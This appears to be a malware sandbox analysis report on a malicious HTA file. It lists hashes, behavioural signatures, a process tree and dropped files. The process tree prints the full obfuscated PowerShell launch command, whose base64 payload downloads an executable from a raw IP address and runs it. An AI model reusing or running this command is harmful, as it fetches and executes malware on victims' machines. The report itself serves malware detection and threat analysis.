Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23/10/2024, 06:06
Static task
static1
Behavioral task
behavioral1
Sample
greatthingswithgreatideasgivenmerestthignstgood.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
greatthingswithgreatideasgivenmerestthignstgood.hta
Resource
win10v2004-20241007-en
General
-
Target
greatthingswithgreatideasgivenmerestthignstgood.hta
-
Size
130KB
-
MD5
b507badbce69dc67d803b7f3b1385036
-
SHA1
b15c7634732a783b64414505ac4a5c095405f886
-
SHA256
80b9bfa671f8626c76da94f0f39a03987278bd32e40851068a399bc69a4e05ca
-
SHA512
a844a487906193c9265b67d7f3b1b617de3f227c205e043a1238cca7dbb9c1782480b001bd68de97cc86597e13205466bd433771b681d9b64bb4404f67f1abd3
-
SSDEEP
96:Eam7xBVS9Mrv6VS9qrvpDCFl/Aoy58VS9sVS9QSrvdVS967T:Ea2xBQ9Gv6Q9wvaoiQ9sQ9QIvdQ9QT
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 21 5048 POWershEll.EXe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 5048 POWershEll.EXe 3696 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 2356 wlanext.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000f000000023b50-75.dat autoit_exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3612 2356 WerFault.exe 98 -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POWershEll.EXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wlanext.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 5048 POWershEll.EXe 5048 POWershEll.EXe 3696 powershell.exe 3696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 5048 POWershEll.EXe Token: SeDebugPrivilege 3696 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2356 wlanext.exe 2356 wlanext.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 2356 wlanext.exe 2356 wlanext.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 3564 wrote to memory of 5048 3564 mshta.exe 85 PID 3564 wrote to memory of 5048 3564 mshta.exe 85 PID 3564 wrote to memory of 5048 3564 mshta.exe 85 PID 5048 wrote to memory of 3696 5048 POWershEll.EXe 89 PID 5048 wrote to memory of 3696 5048 POWershEll.EXe 89 PID 5048 wrote to memory of 3696 5048 POWershEll.EXe 89 PID 5048 wrote to memory of 3540 5048 POWershEll.EXe 92 PID 5048 wrote to memory of 3540 5048 POWershEll.EXe 92 PID 5048 wrote to memory of 3540 5048 POWershEll.EXe 92 PID 3540 wrote to memory of 1872 3540 csc.exe 95 PID 3540 wrote to memory of 1872 3540 csc.exe 95 PID 3540 wrote to memory of 1872 3540 csc.exe 95 PID 5048 wrote to memory of 2356 5048 POWershEll.EXe 98 PID 5048 wrote to memory of 2356 5048 POWershEll.EXe 98 PID 5048 wrote to memory of 2356 5048 POWershEll.EXe 98 PID 2356 wrote to memory of 5056 2356 wlanext.exe 99 PID 2356 wrote to memory of 5056 2356 wlanext.exe 99 PID 2356 wrote to memory of 5056 2356 wlanext.exe 99
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatthingswithgreatideasgivenmerestthignstgood.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3564 -
C:\Windows\SysWOW64\wINDoWSpoWeRsheLL\v1.0\POWershEll.EXe"C:\Windows\SystEM32\wINDoWSpoWeRsheLL\v1.0\POWershEll.EXe" "pOwERsHell.eXe -Ex BYpASs -nop -W 1 -c DeViCECREDENTIALDEploymENt ; ieX($(IEX('[syStem.teXt.encoDiNG]'+[ChAr]0X3A+[chAr]58+'UTf8.geTSTriNG([SysteM.cOnVeRt]'+[ChaR]0X3a+[cHAR]58+'FRoMbasE64STRiNg('+[CHaR]34+'JFNUVUdrR1YgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyRGVGaW5pdElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVE8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbXBULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV01mQlhnZEssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR1V0bW1tZ1lxb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBreUh1S0wpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia0pUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FU1BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTVFVHa0dWOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNDUvNTcwL3dsYW5leHQuZXhlIiwiJGVudjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUYVJ0LXNMZWVQKDMpO3N0QXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[char]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpASs -nop -W 1 -c DeViCECREDENTIALDEploymENt3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3696
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\luwjyflo\luwjyflo.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3540 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6CD3.tmp" "c:\Users\Admin\AppData\Local\Temp\luwjyflo\CSC4B235646806A45B095E8FFE49E519249.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:1872
-
-
-
C:\Users\Admin\AppData\Roaming\wlanext.exe"C:\Users\Admin\AppData\Roaming\wlanext.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\wlanext.exe"4⤵PID:5056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 7524⤵
- Program crash
PID:3612
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2356 -ip 23561⤵PID:4728
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD5a564e2d35bb441c570dcee5ebbbcc4be
SHA15225b8d99c4fae81f2249f7e5906f428e9b4ce60
SHA256e7235db1db682e1e8e9381ad5c2445da4abffe6fe785c06deff9e8f39688cbfc
SHA512614792ccf09aaa14ce2e3ec5c1a90c06c0c0f485779db96094258b2888c5201bcf5b9b8d3bd0297133c774be7db5fa071543b1c41a10b67e680505dd6be470e6
-
Filesize
1KB
MD50b00b2fa7c48371d8a690584bbed2ff3
SHA1263e0b7c9bd7c8606217aa1f2a2db6e89450e85f
SHA25628d190d461945a1707f494e2346a39f5992d999bd1616e0cdd3f5f1a1c30664f
SHA512e2bd747806c610fa0cec3dca09503a716c74152521e2e1fab99dc9b89647bf19549c7fe4c1e30d773c490cba79b3e362f44fd78c38cc1738a59957f8e01929b7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5aac5f02fc411c73c3f186cae05fe35c9
SHA1786a76dd57ce49718a80eb11e160d9c8ba621db3
SHA256be3ef8ca5d36078deef6ad5828f05902b7dcccbc46f2a95fe45fd6fa0771b846
SHA512680f1252f59d864adc444d6225083476bde3a7da062b99bece9eceb9db38c4c9be5060d80eaf2b3429642743a561ed4449bbf39e44ebcff97c9373e6703bf949
-
Filesize
921KB
MD5a019a791761f4d9afb7320f65bb6d925
SHA1ce010189dfcf3a620732522aa44404f2fbc6a9f4
SHA2563648d3be908fd29aa493de57b767ba8c192f703ae416624b6b722733928cb5aa
SHA512f81cace2ed94a84899f5812a4e3bde6149f393dde6eba4d1fb06b1493af20114dd05e6cdbef98bfe960b6643d8814bc66345ee76b755b102edfabf436f5cf4a6
-
Filesize
652B
MD56182bbe6589350ff303b4da9b16f850e
SHA17bfccbc746822373e4449f8ccaf8c401adc48273
SHA256fc101d03db6b880e9e3de07b58a15c8fdbb500b666faafe0532b1661fb84e72a
SHA51213d8243e49369b7da0faa2298903f2b983adcce654b8458968bf419178359fdcba503bdf13eca4d222b55014abdc6f679eabaf79430be8885408a397d8093178
-
Filesize
467B
MD5bebfacc2d07a38d08e81ee839f88d2e7
SHA18330fe9e223ac4d1084c4518273c8c68f4edfcd6
SHA256c1be21408fe017c39fccef19dcd8c332c6985209103fc5a0682b7780aaf34e1d
SHA5126d645019b48739f665ec479e237c4f64a9e42bda04ad0df0b458e168e762f44740bca8782e70767207c5e327c5d6d206b56e1c3789c45ca592332251aab8b8cf
-
Filesize
369B
MD5a408c4ca5570eb83fc15f1335cffd3d0
SHA17406a27d5a3f6eebfacdaee58e9d39963ba03517
SHA2567d7fb20f205a299ef4f3cd527994b1b95b2974922c37f3dd3828642d8a79bac2
SHA512b924fb444674ab9bd064ef773f02e9b4676d4b74f2475f19422c5f7ecfdd7b697fec8ca1d85e5e2cd7d591982c1682bb08aa875d58bd606b6f69bdb3ab99a513